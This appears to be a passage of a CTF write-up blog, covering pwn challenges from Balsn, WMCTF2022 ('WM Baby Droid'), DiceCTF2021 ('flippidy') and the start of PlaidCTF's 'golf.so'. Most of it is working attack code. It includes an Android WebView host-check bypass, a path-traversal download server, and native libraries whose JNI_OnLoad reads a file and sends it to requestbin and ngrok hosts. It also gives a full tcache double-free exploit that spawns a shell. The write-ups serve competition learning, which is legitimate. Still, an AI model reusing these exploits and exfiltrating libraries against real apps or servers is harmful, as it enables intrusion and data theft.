'JdAJeAJfAJgAJhAJiAJjAJkAJlAJmAJnAJoAJpAJqAJrAJsAJtAJuAJvAJwAJxAJyAJzAJ1AJ2AJ3AJ'\
'4AJ5AJ6AJ7AJ8AJ9AJ0AKBAKCAKDAKEAKFAKGAKHAKIAKJAKKAKLAKMAKNAKOAKPAKQAKRAKSAKTAKU'\
'AKVAKWAKXAKYAKZAKaAKbAKcAKdAKeAKfAKgAKhAKiAKjAKkAKlAKmAKnAKoAKpAKqAKrAKsAKtAKuA'\
'KvAKwAKxAKyAKzAK1AK2AK3AK4AK5A' | nc localhost 13337

The binary is using alarm to terminate the child process after 5 seconds. This will give us a very short time to use gdb.

To circumvent this. I just setup a breakpoint in alarm and modified the RDI register value (first parameter) to a higher value.

pwndbg> ni 7 # get past fork
...
pwndbg> b alarm
...
pwndbg> b *route+1152
...
pwndbg> c
...
pwndbg> set $rdi = 0x1000000
...
pwndbg> c
   0x556a06e37205     mov    rdi, rax
 ► 0x556a06e37208     call   connect_backend                
        rdi: 0x7ffca57904c0 ◂— 0x646e656b636162 /* 'backend' */
        rsi: 0x7ffca5790340 ◂— 0x414f45414e45414d ('MAENAEOA')
        rdx: 0x7ffca578ffe0 —▸ 0x556a076d72a0 ◂— 0x4143414142414141 ('AAABAACA')
        rcx: 0x7ffca578ffe8 ◂— 0x3ff
 
   0x556a06e3720d     mov    rdx, qword ptr [rbp - 0x18]

1	void connect_backend(char host, char port, char *data, size_t dataLen);

Port will be in the second argument, $RSI and we can see the De Bruijn value 0x414f45414e45414d.

We can use r2 to calculate this offset:

1
2
3

r2 src/flag_market
[0x00001460]> wopO 0x414f45414e45414d
768

The offset needed is 768 so we can do a oneliner to get the flag in the server (the port needs to be in this format, 31331 as a string due to the fact the binary uses atoi):

1 2	$ python -c "print('A'*768+'31337')" \| nc flag-market-us.balsnctf.com 26790 BALSN{5sRf_1n_b!n4ry?!?!6589621de02ead8cae80fa4e6d0f905e}

[Pwn] WMCTF2022 - WM Baby Droid

2022-08-23T01:05:21.345Z

WM Baby Droid

Solves: 1
Points: 500
Description:
nc 43.248.96.7 10086
Attachment:
download
d9c14779206634d37e7f0e43d5c9537a
Author: bubble#2768

TLDR

Bypass domain google.com verification with javascript:// to redirect to the evil website.
App trusts download_name so we can use path transversal to save the downloaded library into internal storage.
Write a native library that will read the flag from the file system and send it through a socket.
Write the necessary javascript to trigger the javascriptinterface and execute our malicious library.

Introduction

After downloading the attachment we have the following files:

$ unzip -l WM_Baby_Droid.zip  
Archive:  WM_Baby_Droid.zip
  Length      Date    Time    Name
---------  ---------- -----   ----
     1978  2022-05-19 10:20   attachment/Dockerfile
  3897305  2022-08-19 10:44   attachment/app-debug.apk
       11  2022-08-19 11:36   attachment/flag
     2333  2022-08-19 10:26   attachment/readme.md
     1022  2022-08-19 10:30   attachment/run.sh
     7848  2022-08-19 10:40   attachment/server.py
      232  2022-04-19 18:58   attachment/server.sh
---------                     -------
  3910729                     7 files

Lets start by analysing the server.py.

The server will request a poc url from the begining to be sent to the app through an intent:

print_to_user("Please enter your poc url:")
url = sys.stdin.readline().strip()
# url should be like "http://xxx" to to ensure that `adb shell` passes intent.data correctly.
if url.strip('"') == url:
    url = f'"{url}"'
...
adb_activity(f"{VULER}/.MainActivity", wait=True, data=url)

More useful information is given to us when a new emulator with android API_30 and x86_64 architecture is created:

def setup_emulator():
    subprocess.call(
        "avdmanager" +
        " create avd" +
        " --name 'pixel_xl_api_30'" +
        " --abi 'google_apis/x86_64'" +
        " --package 'system-images;android-30;google_apis;x86_64'" +
        " --device pixel_xl" +
        " --force" +
        ("" if isMacos  else " > /dev/null 2> /dev/null"),
        env=ENV,
        close_fds=True,
        shell=True)

    return subprocess.Popen(
        "emulator" +
        " -avd pixel_xl_api_30" +
        " -no-cache" +
        " -no-snapstorage" +
        " -no-snapshot-save" +
        " -no-snapshot-load" +
        " -no-audio" +
        " -no-window" +
        " -no-snapshot" +
        " -no-boot-anim" +
        " -wipe-data" +
        " -accel on" +
        " -netdelay none" +
        " -no-sim" +
        " -netspeed full" +
        " -delay-adb" +
        " -port {}".format(EMULATOR_PORT) +
        ("" if isMacos  else " > /dev/null 2> /dev/null ") +
        "",
        env=ENV,
        close_fds=True,
        shell=True,
        preexec_fn=os.setsid)
...
print_to_user("Preparing android emulator. This may takes about 2 minutes...\n")
emulator = setup_emulator()
adb(["wait-for-device"])

We also know from the file that the flag is being broadcasted here:

1 2	with open(FLAG_FILE, "r") as f: adb_broadcast(f"com.wmctf.SET_FLAG", f"{VULER}/.FlagReceiver", extras={"flag": f.read()})

Static Analysis

The apk doesn’t have a lot of obfuscation (this was expected since the category of the challenge is pwn and not a reverse).

We used jadx to analyse the app so lets see what we have in the AndroidManifest.xml.

The application only has the INTERNET permission to connect to the internet, a receiver and the main activity:

<uses-permission android:name="android.permission.INTERNET"/>
...
<activity android:name="com.wmctf.wmbabydroid.MainActivity" android:exported="true">
...
<receiver android:name="com.wmctf.wmbabydroid.FlagReceiver" android:exported="false">
...

The launcher activity:

The receiver:

We don’t have to worry to generate a broadcast since the server will generate one for us (we saw this in the introduction section).

Bypass getHost

Since there is a verification to allow google.com urls to be loaded:

1	if (!uri.getHost().endsWith(".google.com")) {

Me and my friend had this great idea of actually hosting our website in sites.google.com, we did implement this and the poc was working locally unfortunately everything into to the garbage when the organizers told us that China banned google so the servers wouldn’t be able to connect to google domains.

Hearing this we finally realized this was probably a url parsing challenge and we tried multiple tricks like the ones mentioned in the orange blackhat presentation without any success.

We eventually found this CVE about a vulnerability in getHost but it looks it only works on older API versions, more recent ones are already patched (We also know from the emulator configuration that the android API version is 30 so this wouldn’t work).

We tried to analyse Android API 30 code trying to find a flaw in the code and also checking the URL RFC and try new things but without any success.

We also thought of using an redirect to bypass the check but since the server is hosted in china and google.com is banned we forgot about this for a while.

Another idea showed up on trying to use file:// to access the internal files of the emulator and read the flag, unfortunately to use this requires a special permission in the webview so we discarded this option.

Eventually the organizers published an announcement for this challenge giving the tip to use javascript://.

In the end it was kind of “simple” but we didn’t remember of trying javascript:// which makes sense and it eventually doesn’t even need to request the google domain which is perfect.

The hint given was:

Baby Droid Hint: JavaScript://www.google.com/%0d%0awindow.location.href='http://evil.com/'

Drop the file into the internal storage file directory

The downloaded file is being saved in the external storage cache directory:

1	String destPath = new File(MainActivity.this.getExternalCacheDir(), fileName).getPath();

Because of this we need to find a way to move it to the files directory (shared library will be loaded from that dir):

1	File so = new File(getFilesDir() + "/lmao.so");

Since the server trusts the download_name from the header Content-Disposition we can use Path Transversal to save the file to the folder we want.

The file is saved in /storage/emulated/0/Android/data/com.wmctf.wmbabydroid/cache and we want to move it to /data/data/com.wmctf.wmbabydroid/files/lmao.so.

To achieve this we used the following download_name -> ../../../../../../../data/data/com.wmctf.wmbabydroid/files/lmao.so.

We used flask to implement the server in the backend:

from flask import Flask, send_file, make_response,render_template
from flask_cors import CORS

def create_app(test_config=None):
    app = Flask(__name__)
    CORS(app, expose_headers=["Content-Disposition"])

    @app.route('/')
    def index():
        return render_template('index.html')

    @app.route('/download')
    def download():
        response = make_response(send_file(
            "libcargo.so",
            as_attachment=True,
            download_name="../../../../../../../data/data/com.wmctf.wmbabydroid/files/lmao.so"
        ))
        response.headers['Content-Disposition'] = 'attachment; filename=../../../../../../../data/data/com.wmctf.wmbabydroid/files/lmao.so'
        response.headers['User-Agent'] = 'kekw'
        return response

    return app

create_app().run(debug=True, port=80, host='0.0.0.0')

Implement the shared library

We will have the opportunity to run a malicious library in the victim’s device so we need to write a code that will read the flag from the file system and send the flag to through a HTTP request or a socket using tcp.

Usually an android application has native methods that will be called from the native lib like in this example:

1	public native String getSystemTime();

In this case we don’t have any, but looking at the documentation it seems when system.load is executed a function named JNI_OnLoad will be executed:

/**
     * Loads the native library specified by the libname
     * argument.  The libname argument must not contain any platform
     * specific prefix, file extension or path. If a native library
     * called libname is statically linked with the VM, then the
     * JNI_OnLoad_libname function exported by the library is invoked.
     * See the JNI Specification for more details.
     *
     * Otherwise, the libname argument is loaded from a system library
     * location and mapped to a native library image in an implementation-
     * dependent manner.
     **/
public static void loadLibrary(String libname) {
    Runtime.getRuntime().loadLibrary0(VMStack.getCallingClassLoader(), libname);
}

The following picture illustrates this well:

I’m not an android developer myself but since I’ve reversed a bunch of malware in my work using rust native libraries I decided to implement one in rust, since I already had some experience doing it and I thought it wouldn’t be a problem doing it here as well.

Unfortunately this ended up being an bad idea since rust libraries are usually bigger than the normal ones and this messed up our final payload (size was about 11mb but it was enough to disturb the poc in the server).

For the lulz we will share the rust library we implemented:

use std::os::raw::{c_char};
use std::ffi::{CString, CStr};
use std::fs;
use std::ffi::c_void;
use hyper_tls::HttpsConnector;
use std::{thread, time};

#[macro_use] extern crate log;
extern crate android_log;


async fn kekw() ->  Result<(), Box>{
    // Create a new client object

    while true { 
        let b = std::path::Path::new("/data/data/com.wmctf.wmbabydroid/files/flag").exists();
        info!("Stuck in the loop {}", b);

        let https2 = HttpsConnector::new();
        let client2 = hyper::Client::builder()
        .build::<_, hyper::Body>(https2);

        // Build out our request
        let req = hyper::Request::builder()
        .method(hyper::Method::POST)
        .uri("")
        .header("user-agent", "WTF")
        .header("content-type", "application/json")
        .body(hyper::Body::from("Stuck waiting for flag"))?;
         let resp2 = client2.request(req).await?;

        // Get the response body bytes.
        let body_bytes2 = hyper::body::to_bytes(resp2.into_body()).await?;

        // Convert the body bytes to utf-8
        let body2 = String::from_utf8(body_bytes2.to_vec()).unwrap();
        if b {
            break;
        }
        let ten_millis = time::Duration::from_millis(500);
        let now = time::Instant::now();
        thread::sleep(ten_millis);
    }

    //let ten_millis = time::Duration::from_millis(2000);
    //let now = time::Instant::now();
    //thread::sleep(ten_millis);
    
    let https = HttpsConnector::new();
    let client = hyper::Client::builder()
    .build::<_, hyper::Body>(https);

    //let client = hyper::Client::new();
    let contents = fs::read_to_string("/data/data/com.wmctf.wmbabydroid/files/flag")
        .expect("Should have been able to read the file");
    info!("this is a debug {}", contents);
    // Build out our request
    let req = hyper::Request::builder()
        .method(hyper::Method::POST)
        .uri("https://requestbin.io/wn9ivmwn")
        .header("user-agent", "WTF")
        .header("content-type", "application/json")
        .body(hyper::Body::from(contents))?;

    // Pass our request builder object to our client.
    let resp = client.request(req).await?;

    // Get the response body bytes.
    let body_bytes = hyper::body::to_bytes(resp.into_body()).await?;

    // Convert the body bytes to utf-8
    let body = String::from_utf8(body_bytes.to_vec()).unwrap();
    info!("this is a debug {}", body);
    //println!("{}", body);
    Ok(())

}


/// Expose the JNI interface for android below
#[cfg(target_os="android")]
#[allow(non_snake_case)]
pub mod android {
    extern crate jni;

    use super::*;
    use self::jni::JNIEnv;
    use self::jni::JavaVM;
    use self::jni::objects::{JClass, JString};
    use self::jni::sys::{jstring};
    use self::jni::sys::JNI_VERSION_1_6;
    use self::jni::sys::{jint, jshort};  

    #[no_mangle]
    pub extern "system" fn JNI_OnLoad(_vm: JavaVM, _reserved: *mut c_void) -> jint {
        android_logger::init_once(
            android_logger::Config::default().with_min_level(log::Level::Trace),
        );

        let c_str = unsafe {  CStr::from_ptr(CString::new("kekw feast").unwrap().as_ptr()) };
        let recipient = match c_str.to_str() {
            Err(_) => "there",
            Ok(string) => string,
        };


        let mut rt = tokio::runtime::Runtime::new().unwrap();
        match rt.block_on(kekw()) {
            Ok(_) => info!("Done"),
            Err(e) => error!("An error ocurred: {}", e),
        };
        info!("kekw");
        //CString::new("Hellow ".to_owned() + recipient).unwrap().into_raw();
        JNI_VERSION_1_6
    }
}

Rust lib was working locally but not in the challenge server so much later we decided to re-implement using “normal” native libraries (file size was reduced to 800kb):

#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include "jni.h"


bool is_file_exist(const char * fileName) {
    std::ifstream infile(fileName);
    bool r = infile.good();
    infile.close();
    return r;
}
class Task {
public:
    void execute(std::string command) {
        int sockfd, portno;
        struct sockaddr_in serv_addr;
        struct hostent * server;
        char buffer[256] = "";

        portno = 12099;
        sockfd = socket(AF_INET, SOCK_STREAM, 0);
        server = gethostbyname("4.tcp.eu.ngrok.io");
        if (server == NULL) {
            fprintf(stderr, "ERROR, no such host\n");
            exit(0);
        }
        bzero((char * ) & serv_addr, sizeof(serv_addr));
        serv_addr.sin_family = AF_INET;
        bcopy((char * ) server -> h_addr,
              (char * ) & serv_addr.sin_addr.s_addr,
              server -> h_length);
        serv_addr.sin_port = htons(portno);
        if (connect(sockfd, (struct sockaddr * ) & serv_addr, sizeof(serv_addr)) < 0)
            fprintf(stderr, "ERROR connecting");
        while (true) {
            if (is_file_exist("/data/data/com.wmctf.wmbabydroid/files/flag")) {
                break;
            }
            send(sockfd, "File doesn't exist yet\n", strlen("File doesn't exist yet\n"), 0);
            sleep(1);
        }
        FILE * fd = fopen("/data/data/com.wmctf.wmbabydroid/files/flag", "r");
        int i = 0;
        while (1) {
            char c = fgetc(fd);
            if (feof(fd))
                break;
            buffer[i++] = c;
        }
        fclose(fd);
        if (send(sockfd, buffer, strlen(buffer), 0) < 0) {
            char * write_error = strerror(errno);
        }
        close(sockfd);
    }
};
JNIEXPORT jint JNI_OnLoad(JavaVM * vm, void * ) {
    JNIEnv * env;

    if (vm -> GetEnv(reinterpret_cast < void ** > ( & env), JNI_VERSION_1_6) != JNI_OK) {
        return JNI_ERR;
    }
    Task taskPtr;
    std::thread th( & Task::execute, taskPtr, "Sample Task");
    th.join();
    return JNI_VERSION_1_6;
}

We also added this infinite loop to check if the flag file already exists (If the payload is too fast the flag might not be in the directory):

while(true){
        if (is_file_exist("/data/data/com.wmctf.wmbabydroid/files/flag")) {
          break;
        }
        send(sockfd, "File doesn't exist yet\n", strlen("File doesn't exist yet\n"), 0);
        sleep(1);
      }

One line command to extract the lib from the built apk:

1	unzip -p ~/AndroidStudioProjects//app/build/outputs/apk/debug/app-debug.apk lib/x86_64/libwmbabydroid.so > libcargo.so

We followed the google documentation on how to implement native libraries in android.

Trigger the @JavascriptInterface code

Javascript Interfaces allows exposing methods to JavaScript:

webView.addJavascriptInterface(this, "lmao");
...
@JavascriptInterface
public void lmao() {
    try {
        File so = new File(getFilesDir() + "/lmao.so");
        if (so.exists()) {
            System.load(so.getPath());
        }
    } catch (Exception e) {
        e.printStackTrace();
    }
}

The @JavascriptInterface notation will allow us to execute java code function from javascript for example to execute the code above we can use:

1
2
3

function javaInterface() {
    lmao.lmao();
}

To trigger the download and the JavascriptInterface we created the following html file:

<html>
  <body onload="getAll()">
    
    <a href="/download" id="test">qweqwea>
  body>
  <script>
    function getAll() {
      lmao.lmao();
      setTimeout(download, 3000);
      setTimeout(timeoutFunc, 15000);
    }

    function download() {
      document.getElementById("test").click();
    }

    function timeoutFunc() {
      lmao.lmao();
    }
  script>
html>

Note that running lmao.lmao() first is very important since the files directory is not created when the apk is installed.

The method getFilesDir() will create the directory for us:

1	File so = new File(getFilesDir() + "/lmao.so");

Final script

Using pwntools to send the link to the app in the server

from pwn import *
import re
import hashlib
import string
import traceback


def main():
    r = remote('localhost', 10086) if not args.REMOTE else remote(
        '43.248.96.7', 10086)
    a = r.recvuntil(b"Please enter the xxxx to satisfy the above equation:\n")
    begin, end, hash_digest = re.findall(
        r'(?<=")[a-zA-Z0-9]+?(?=")', a.decode())
    for a in string.ascii_letters:
        for b in string.ascii_letters:
            for c in string.ascii_letters:
                for d in string.ascii_letters:
                    test_hash = hashlib.sha256(
                        (begin+a+b+c+d).encode()).hexdigest()
                    if test_hash == hash_digest:
                        print(a+b+c+d)
                        r.sendline((a+b+c+d).encode())
                        r.recvuntil(b'Please enter your poc url:\n')
                        r.sendline(
                            "JavaScript://www.google.com/%0d%0awindow.location.href='{}'".format(args.HOST).encode())
                        print(r.recvuntil(b'exiting......\n', timeout=60*5))
                        r.close()
                        return


if args.LOOP:
    while True:
        try:
            main()
        except KeyboardInterrupt:
            break
        except:
            traceback.print_exc()
            continue
else:
    main()

Running it:

$ python wm_baby_droid.py REMOTE LOOP HOST=https://wmctf2022.herokuapp.com
[+] Opening connection to 43.248.96.7 on port 10086: Done
xthO
b'Preparing android emulator. This may takes about 2 minutes...\n\nLaunching! Let your apk fly for a while...\n\nexiting......\n'
[*] Closed connection to 43.248.96.7 port 10086
[+] Opening connection to 43.248.96.7 on port 10086: Done
xsEK
[*] Closed connection to 43.248.96.7 port 10086

Receiving the flag on our listening service:

1 2	$ nc -l -k 5000 WMCTF{e0230a12-fa8d-443a-959a-bb61d24e5132}

The flag was WMCTF{e0230a12-fa8d-443a-959a-bb61d24e5132}

[Pwn] DiceCTF2021 - flippidy

2021-02-08T06:03:26.000Z

flippidy

Solves: 62
Points: 149
Description:
See if you can flip this program into a flag :D
nc dicec.tf 31904
flippidy
45ffbb615d868486383a07220e6e6bfc
libc.so.6
50390b2ae8aaa73c47745040f54e602f
Author: joshdabosh

TLDR

Set the limit of notes to 1.
Alloc a new note with the global 0x404020.
Running flip will trigger a double free and poison the next pointer of tchachebin[0x40] to 0x404020.
Next malloc will write to 0x404020 which is where is located the pointer of the strings of the menu.
Change this pointers to a GOT['fgets'] to get a leak, at the same time we can corrupt the pointer at 0x404040 to 0x404158.
0x404158 is the address of the first entry of the note list having the control of this will give us arbitrary write at our control.
Change the pointer at 0x404158 to free_hook and set it to one_gadget.
Trigger free with flip function to get a shell.

Information extraction

File

1
2

$ file flippidy
flippidy: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=9bad92d378d5af68a52fd2856145dc8588533a25, for GNU/Linux 3.2.0, stripped

Security

1
2
3

$ checksec --file=flippidy
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH  Symbols     FORTIFY Fortified   Fortifiable FILE
Full RELRO      Canary found      NX enabled    No PIE          No RPATH   No RUNPATH   No Symbols    No    0       4       flippidy

Static analysis

Main function

void __fastcall __noreturn main(__int64 a1, char **a2, char **a3)
{
  int v3; // [rsp+Ch] [rbp-4h]

  setbuf(stdout, 0LL);
  setbuf(stdin, 0LL);
  setbuf(stderr, 0LL);
  sub_401211();
  printf("%s", "To get started, first tell us how big your notebook will be: ");
  firstRead_404150 = sub_401254();
  qword_404158 = malloc(8 * firstRead_404150);
  memset(qword_404158, 0, 8 * firstRead_404150);
  while ( 1 )
  {
    sub_4011C6();
    printf(": ");
    v3 = sub_401254();
    if ( v3 == 3 )
    {
      puts("Goodbye!");
      exit(0);
    }
    if ( v3 > 3 )
    {
LABEL_11:
      puts("Invalid choice.");
    }
    else if ( v3 == 1 )
    {
      add_4012D0();
    }
    else
    {
      if ( v3 != 2 )
        goto LABEL_11;
      flip_401378();
    }
  }
}

The main function asks for the size of the note list, the size of the list is stored at 0x404150:

__int64 sub_401254()
{
  char s; // [rsp+10h] [rbp-20h]
  unsigned __int64 v2; // [rsp+28h] [rbp-8h]

  v2 = __readfsqword(0x28u);
  memset(&s, 0, 0x14uLL);
  if ( !fgets(&s, 0x14, stdin) )
    exit(0);
  return (unsigned int)atoi(&s);
}
...
printf("%s", "To get started, first tell us how big your notebook will be: ");
firstRead_404150 = sub_401254();
...

sub_4011c6 will print the menu with the options to operate on the notebook, note that the strings are present in a global variable at 0x404020.

int sub_4011C6()
{
  int result; // eax
  int i; // [rsp+Ch] [rbp-4h]

  result = puts("\n");
  for ( i = 0; i <= 3; ++i )
    result = puts(off_404020[i]);
  return result;
}
 ...
 while ( 1 )
  {
    sub_4011C6();
    printf(": ");
    ...
  }
  ...

A very important thing to refer that offsets at 0x404020 contains pointers (we can use this later if we manage to get an arbitrary write to leak libc):

.data:0000000000404020 off_404020      dq offset aMenu         ; DATA XREF: sub_4011C6+2A↑o
.data:0000000000404020                                         ; "----- Menu -----"
.data:0000000000404028                 dq offset a1AddToYourNote ; "1. Add to your notebook"
.data:0000000000404030                 dq offset a2FlipYourNoteb ; "2. Flip your notebook!"
.data:0000000000404038                 dq offset a3Exit        ; "3. Exit"
.data:0000000000404040 aMenu           db '----- Menu -----',0 ; DATA XREF: .data:off_404020↑o

Add to your notebook

We can add new notes with option 1, the size is limited to 0x30.

int sub_4012D0()
{
  void **v1; // rbx
  int v2; // [rsp+Ch] [rbp-14h]

  printf("Index: ");
  v2 = sub_401254();
  if ( v2 < 0 || v2 >= firstRead_404150 )
    return puts("Invalid index.");
  v1 = (void **)((char *)qword_404158 + 8 * v2);
  *v1 = malloc(0x30uLL);
  printf("Content: ");
  return (unsigned __int64)fgets(*((char **)qword_404158 + v2), 0x30, stdin);
}

Flip function

Flip function will exchange the position of the notes hence the name flipping, in the end it frees the old notes and mallocs the new ones by copping their contents with strcpy.

For example if the notebook has 2 notes this how it works:

strcpy the contents of 1st note to s.
Frees 1st note.
strcpy the content of 2nd note to dest.
Frees 2nd note.
malloc and store this new chunk at the position of the 2nd note and strcpy the content of the 1st note s.
malloc and store this new chunk at the position of the 1st note and strcpy the content of the 2nd note dest.

unsigned __int64 sub_401378()
{
  void **v0; // rbx
  void **v1; // rbx
  char v3; // [rsp+Ah] [rbp-A6h]
  char v4; // [rsp+Bh] [rbp-A5h]
  int i; // [rsp+Ch] [rbp-A4h]
  char s; // [rsp+10h] [rbp-A0h]
  char dest; // [rsp+50h] [rbp-60h]
  unsigned __int64 v8; // [rsp+98h] [rbp-18h]

  v8 = __readfsqword(0x28u);
  for ( i = 0; i <= firstRead_404150 / 2; ++i )
  {
    memset(&s, 0, 0x40uLL);
    memset(&dest, 0, 0x40uLL);
    v3 = 0;
    v4 = 0;
    if ( *((_QWORD *)qword_404158 + i) )
    {
      strcpy(&s, *((const char **)qword_404158 + i));
      free(*((void **)qword_404158 + i));
    }
    else
    {
      v3 = 1;
    }
    if ( *((_QWORD *)qword_404158 + firstRead_404150 - i - 1) )
    {
      strcpy(&dest, *((const char **)qword_404158 + firstRead_404150 - i - 1));
      free(*((void **)qword_404158 + firstRead_404150 - i - 1));
    }
    else
    {
      v4 = 1;
    }
    *((_QWORD *)qword_404158 + i) = 0LL;
    *((_QWORD *)qword_404158 + firstRead_404150 - i - 1) = 0LL;
    if ( v3 != 1 )
    {
      v0 = (void **)((char *)qword_404158 + 8 * (firstRead_404150 - i) - 8);
      *v0 = malloc(0x30uLL);
      strcpy(*((char **)qword_404158 + firstRead_404150 - i - 1), &s);
    }
    else
    {
      *((_QWORD *)qword_404158 + firstRead_404150 - i - 1) = 0LL;
    }
    if ( v4 != 1 )
    {
      v1 = (void **)((char *)qword_404158 + 8 * i);
      *v1 = malloc(0x30uLL);
      strcpy(*((char **)qword_404158 + i), &dest);
    }
    else
    {
      *((_QWORD *)qword_404158 + i) = 0LL;
    }
  }
  return v8 - __readfsqword(0x28u);
}

Getting a leak

To get a leak we first need to find a way to get an arbitrary write, we know that the pointers to the strings of the menu are present at a global variable at 0x404020 if we can manage to change this pointer to a GOT address we can leak a libc address.

What happens if we run the flip function when the size of the notebook only has 1 note ?

The 1st note will be also the last note! because of this we will have a double free! and at the same time we will corrupt the next pointer of the tcachebin[0x40] list to the value we want!

Visually this is what happens:

Source code to achieve this:

def add(index, content):
    r.sendlineafter(': ', '1')
    r.sendlineafter('Index: ', str(index))
    r.sendlineafter('Content: ', content)

def flip():
    r.sendlineafter(': ', '2')

r = getConn()
r.sendlineafter('To get started, first tell us how big your notebook will be: ', str(1))
add(0, p64(0x404020))
flip() # Triggers double free

Next malloc will overwrite data in 0x402020 which contains the pointers of the MENU, if we change them to a GOT address we will leak libc in the next menu print of the loop.

The tcache bin list is looking like this right now:

0x0000000000404020 -> 0x0000000000404040 -> 0x654d202d2d2d2d2d

We have enough bytes to overwrite the 3rd item of the list at 0x404040 we can easily poison this tcache bin by changing it to 0x404158.

0x404158 address is important because it contains the pointer of the first note of the notebook, if we control this value we will be able to write anywhere.

# 0x0000000000404020 -> 0x0000000000404040 -> 0x654d202d2d2d2d2d
add(0,p64(elf.got['fgets'])*4+p64(0x404158))
FGETS = u64(r.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))
LIBC = FGETS-libc.symbols['fgets']
SYSTEM = LIBC+libc.symbols['system']
ONE_SHOT = LIBC+0x4f322
log.info("FGETS 0x%x" % FGETS)
log.info("LIBC 0x%x" % LIBC)

Getting a shell

Now that we have libc we just need to overwrite malloc_hook or free_hook to one_gadget to get a shell.

After our last malloc the tcachebin is looking like this:
0x0000000000404040 -> 0x0000000000404158 -> 0x0000000000b65260 -> 0x404020 -> …

1st malloc and setting 0xdeadbeef as input, the list will look like this:
0x0000000000404158 -> 0x0000000000b65260 -> 0x0000000000404040 -> 0x00000000deadbeef
2nd malloc and setting p64(LIBC+libc.symbols[‘__free_hook’]) as input:
0x0000000000b65260 -> 0x0000000000404158 -> FREE_HOOK -> 0x0
3rd malloc and setting 0xdeadbeef as input:
0x0000000000404158 -> FREE_HOOK -> 0x0000000000b65260 -> 0xdeadbeef
4th malloc and setting p64(LIBC+libc.symbols[‘__free_hook’]) as input:
FREE_HOOK -> 0x0000000000404158 -> FREE_HOOK -> …

Next malloc will write into FREE_HOOK, with that we can easily fill it with one_gadget address.

The python code:

# 0x0000000000404040 -> 0x0000000000404158 -> 0x0000000000b65260 -> 0x404020 -> ...
add(0,p64(0xdeadbeef))
# 0x0000000000404158 -> 0x0000000000b65260 -> 0x0000000000404040 -> 0x00000000deadbeef
add(0,p64(LIBC+libc.symbols['__free_hook']))
# 0x0000000000b65260 -> 0x0000000000404158 -> FREE_HOOK -> 0x0
add(0,p64(0xdeadbeef))
# 0x0000000000404158 -> FREE_HOOK -> 0x0000000000b65260 -> 0xdeadbeef
add(0,p64(LIBC+libc.symbols['__free_hook']))
# FREE_HOOK -> 0x0000000000404158 -> FREE_HOOK -> ...
add(0,p64(ONE_SHOT)) # Sets FREE_HOOK to ONE_SHOT

Triggering free to get a shell:

1
2
3

flip() # Triggers free_hook and gets ourselves a shell
r.interactive()
r.close()

The entire script:

from pwn import *
host, port = "dicec.tf", "31904"
filename = "./flippidy"
elf = ELF(filename)
context.arch = 'amd64'

if not args.REMOTE:
    libc = elf.libc
else:
    libc = ELF('./libc-2.27.so')

def getConn():
    return process(filename) if not args.REMOTE else remote(host, port)

def get_PIE(proc):
    memory_map = open("/proc/{}/maps".format(proc.pid),"rb").readlines()
    return int(memory_map[0].split("-")[0],16)

def debug(bp):
    script = ""
    PIE = get_PIE(r)
    for x in bp:
        script += "b *0x%x\n"%(x)
    gdb.attach(r,gdbscript=script)

def add(index, content):
    r.sendlineafter(': ', '1')
    r.sendlineafter('Index: ', str(index))
    r.sendlineafter('Content: ', content)

def flip():
    r.sendlineafter(': ', '2')

FREE = [0x4014D2,0x401444]
context.terminal = ['tmux', 'new-window']

r = getConn()

r.sendlineafter('To get started, first tell us how big your notebook will be: ', str(1))
add(0, p64(0x404020))
if not args.REMOTE and args.GDB:
    debug([0x40132F]+FREE)
flip() # Triggers double free



# 0x0000000000404020 -> 0x0000000000404040 -> 0x654d202d2d2d2d2d
add(0,p64(elf.got['fgets'])*4+p64(0x404158))
FGETS = u64(r.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))
LIBC = FGETS-libc.symbols['fgets']
SYSTEM = LIBC+libc.symbols['system']
ONE_SHOT = LIBC+0x4f322
log.info("FGETS 0x%x" % FGETS)
log.info("LIBC 0x%x" % LIBC)



# 0x0000000000404040 -> 0x0000000000404158 -> 0x0000000000b65260 -> 0x404020 -> ...
add(0,p64(0xdeadbeef))
# 0x0000000000404158 -> 0x0000000000b65260 -> 0x0000000000404040 -> 0x00000000deadbeef
add(0,p64(LIBC+libc.symbols['__free_hook']))
# 0x0000000000b65260 -> 0x0000000000404158 -> FREE_HOOK -> 0x0
add(0,p64(0xdeadbeef))
# 0x0000000000404158 -> FREE_HOOK -> 0x0000000000b65260 -> 0xdeadbeef
add(0,p64(LIBC+libc.symbols['__free_hook']))
# FREE_HOOK -> 0x0000000000404158 -> FREE_HOOK -> ...
add(0,p64(ONE_SHOT)) # Sets FREE_HOOK to ONE_SHOT

flip() # Triggers free_hook and gets ourselves a shell
r.interactive()
r.close()

Running the script:

$ python flippidy.py REMOTE
[*] '/ctf/work/pwn/flippidy/flippidy'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[*] '/ctf/work/pwn/flippidy/libc-2.27.so'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[+] Opening connection to dicec.tf on port 31904: Done
[*] FGETS 0x7fb4d2848b20
[*] LIBC 0x7fb4d27ca000
[*] Switching to interactive mode
$ ls
challenge
flag.txt
$ cat flag.txt
dice{some_dance_to_remember_some_dance_to_forget_2.27_checks_aff239e1a52cf55cd85c9c16}

[Misc] PCTF2020 - golf.so

2020-04-20T12:04:00.000Z

Golf.so
Solves: 104
Points: 500
Description:
Upload a 64-bit ELF shared object of size at most 1024 bytes. It should spawn a shell (execute execve(“/bin/sh”, [“/bin/sh”], …)) when used like
LD_PRELOAD= /bin/true
golf.so.pwni.ng

The objective of this challenge is to create an ELF shared library that, when running like this:

1	$ LD_PRELOAD= /bin/true

It should spawn a shell, there is a requirement that the shared library must be less than 1024 bytes to pass the first level. The first thing I tried to do was to use the classic GCC.

First, I use ghidra to look up the binary /bin/true, and it appears that /bin/true automatically exits if the arguments are less than 2, so our options are to overwrite the entry point or _libc_start_main.

After searching online for the function signature of _libc_start_main I wrote this c file:

int __libc_start_main(
  void *func_ptr,
  int argc,
  char* argv[],
  void (*init_func)(void),
  void (*fini_func)(void),
  void (*rtld_fini_func)(void),
  void *stack_end){
    char* args[] = {"/bin/sh",0x0};
    execve("/bin/sh", args, 0x0);
}

Compiling it using gcc:

